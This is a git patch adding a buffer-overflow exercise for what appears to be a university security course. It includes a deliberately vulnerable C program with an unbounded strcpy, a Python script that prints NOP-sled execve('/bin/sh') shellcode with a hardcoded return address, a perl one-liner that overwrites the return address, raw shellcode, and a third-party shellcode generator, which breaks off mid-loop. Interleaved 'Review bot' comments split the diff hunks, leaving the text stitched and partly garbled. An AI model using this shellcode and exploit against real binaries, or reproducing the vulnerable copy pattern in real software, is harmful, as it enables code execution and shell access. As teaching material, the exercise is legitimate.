From 45ec0c7e1bfd251e13f4d3ade89785e98df31ba9 Mon Sep 17 00:00:00 2001
From: Guillermo Ramos
Date: Mon, 27 May 2013 00:07:01 +0200
Subject: start
---
c_seguridad/code/bof/.chuleta.txt | 1 +
c_seguridad/code/bof/exit.asm | 8 +++
c_seguridad/code/bof/exploit.py | 23 ++++++++
c_seguridad/code/bof/exploitable.c | 14 +++++
c_seguridad/code/bof/shellcode | 1 +
c_seguridad/code/bof/shellcodeGen/shellcodeGen.c | 73 ++++++++++++++++++++++++
c_seguridad/code/bof/shellex.asm | 25 ++++++++
c_seguridad/code/bof/test.c | 15 +++++
8 files changed, 160 insertions(+)
create mode 100644 c_seguridad/code/bof/.chuleta.txt
create mode 100644 c_seguridad/code/bof/exit.asm
create mode 100755 c_seguridad/code/bof/exploit.py
create mode 100644 c_seguridad/code/bof/exploitable.c
create mode 100644 c_seguridad/code/bof/shellcode
create mode 100755 c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
create mode 100644 c_seguridad/code/bof/shellex.asm
create mode 100644 c_seguridad/code/bof/test.c
(limited to 'c_seguridad/code/bof')
diff --git a/c_seguridad/code/bof/.chuleta.txt b/c_seguridad/code/bof/.chuleta.txt
new file mode 100644
index 0000000..b5ddbf3
--- /dev/null
+++ b/c_seguridad/code/bof/.chuleta.txt
@@ -0,0 +1 @@
+Exploitable (repetir función): perl -e 'print "A"x72 . "\xd4\x83\x04\x08"'
diff --git a/c_seguridad/code/bof/exit.asm b/c_seguridad/code/bof/exit.asm
new file mode 100644
index 0000000..1ee5f18
--- /dev/null
+++ b/c_seguridad/code/bof/exit.asm
@@ -0,0 +1,8 @@
+SECTION .text
+global _start
+_start:
+ xor eax, eax
+ mov al, 1
+ xor ebx, ebx
+ mov bl, 123
+ int 0x80
diff --git a/c_seguridad/code/bof/exploit.py b/c_seguridad/code/bof/exploit.py
new file mode 100755
index 0000000..5219755
--- /dev/null
+++ b/c_seguridad/code/bof/exploit.py
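Review bot: exit.asm carries no comment saying what it does, and the bare register loads `mov al, 1` and `mov bl, 123` are opaque to a reader of the course material. A one-line header such as `; minimal Linux x86 program: exit(123) via int 0x80 (eax=1 -> sys_exit, ebx = exit status)` would document the intent. The specific status 123 is presumably chosen so a successful run can be checked from the shell with `echo $?`; if so, saying that in the comment would make the file self-explanatory.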
@@ -0,0 +1,23 @@ +#!/usr/bin/env python2 +# -*- coding: utf-8 -*- + +from time import sleep +from os import system + + +shellcode = ( + # Buffer offset + "\x90"*17 + + + # Shellcode (55 chars) + "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b" + "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" + "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" + "\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42" + + "\xf8\xf7\xff\xbf" + ) + +cmd = "./exploitable " + shellcode + +print shellcode diff --git a/c_seguridad/code/bof/exploitable.c b/c_seguridad/code/bof/exploitable.c new file mode 100644 index 0000000..5492a29 --- /dev/null +++ b/c_seguridad/code/bof/exploitable.c @@ -0,0 +1,14 @@ +#include +#include + +void vulnerable(char* str) { + printf("Entrando en vulnerable...\n"); + char arr[60]; + strcpy(arr, str); +} + +int main(int argc, char** argv) { + if (argc > 1) + vulnerable(*(argv+1)); + return 0; +} diff --git a/c_seguridad/code/bof/shellcode b/c_seguridad/code/bof/shellcode new file mode 100644 index 0000000..e36a2c5 --- /dev/null +++ b/c_seguridad/code/bof/shellcode @@ -0,0 +1 @@ +1F11̀1[C[C KS ̀/bin/shNAAAABBBB diff --git a/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c new file mode 100755 index 0000000..0221f48 --- /dev/null +++ b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c 
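Review bot: `from time import sleep`, `from os import system` and the `cmd = "./exploitable " + shellcode` assignment in exploit.py are dead code — nothing in the file uses them, and the script's only effect is `print shellcode`. Remove the unused imports and the unused assignment so a reader is not left guessing what the script is meant to do, or add a module docstring stating that it only emits the payload bytes for the classroom exercise to stdout. The docstring should also note that the file is Python 2 (`#!/usr/bin/env python2`, `print` statement, byte strings), since it will not run unchanged under Python 3. The whole file is contained in this hunk.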
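Review bot: `strcpy(arr, str)` in vulnerable() in exploitable.c copies an argument of arbitrary length from argv[1] into the 60-byte stack buffer `arr`, which is the deliberate flaw of this exercise but is not marked as such anywhere in the file. Add a comment above the call, e.g. `/* INTENTIONALLY VULNERABLE (BOF exercise): unbounded copy into a 60-byte stack buffer. A hardened version would bound the copy, e.g. snprintf(arr, sizeof arr, "%s", str). */`, so the file cannot be mistaken for reusable code. The two `#include` lines show no header name in this rendering; presumably `<stdio.h>` and `<string.h>` were lost to angle-bracket stripping, which is worth confirming against the repository. `*(argv+1)` in main() reads more naturally as `argv[1]`.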
@@ -0,0 +1,73 @@ +/** + * + * BlackLight's shellcode generator for Linux x86 + * Tested anywhere, working & NULL-free + * + * Usage: ./generator + * ...and then you've got a ready2inject NULL-free shellcode for the command you like + * + * copyleft 2008 by BlackLight + * < http://blacklight.gotdns.org > + * + * Released under GPL v.3 licence + * + * Greetz to: evilsocket, for the idea he gave me ;) + * Greetz to: my friends, who tested, used and appreciated this code and helped + * me to improve it to what it is now + * Greetz to: my girl, next to me in any moment even if she had no idea + * about what I was doing ^^ + */ + +#include +#include +#include + +char code[] = + "\\x60" /*pusha*/ + "\\x31\\xc0" /*xor %eax,%eax*/ + "\\x31\\xd2" /*xor %edx,%edx*/ + "\\xb0\\x0b" /*mov $0xb,%al*/ + "\\x52" /*push %edx*/ + "\\x68\\x6e\\x2f\\x73\\x68" /*push $0x68732f6e*/ + "\\x68\\x2f\\x2f\\x62\\x69" /*push $0x69622f2f*/ + "\\x89\\xe3" /*mov %esp,%ebx*/ + "\\x52" /*push %edx*/ + "\\x68\\x2d\\x63\\x63\\x63" /*push $0x6363632d*/ + "\\x89\\xe1" /*mov %esp,%ecx*/ + "\\x52" /*push %edx*/ + "\\xeb\\x07" /*jmp 804839a */ + "\\x51" /*push %ecx*/ + "\\x53" /*push %ebx*/ + "\\x89\\xe1" /*mov %esp,%ecx*/ + "\\xcd\\x80" /*int $0x80*/ + "\\x61" /*popa*/ + "\\xe8\\xf4\\xff\\xff\\xff" /*call 8048393 */; + +int main (int argc, char **argv) { + int i,len=0; + char *shell,*cmd; + + if (!argv[1]) + exit(1); + + for (i=1; i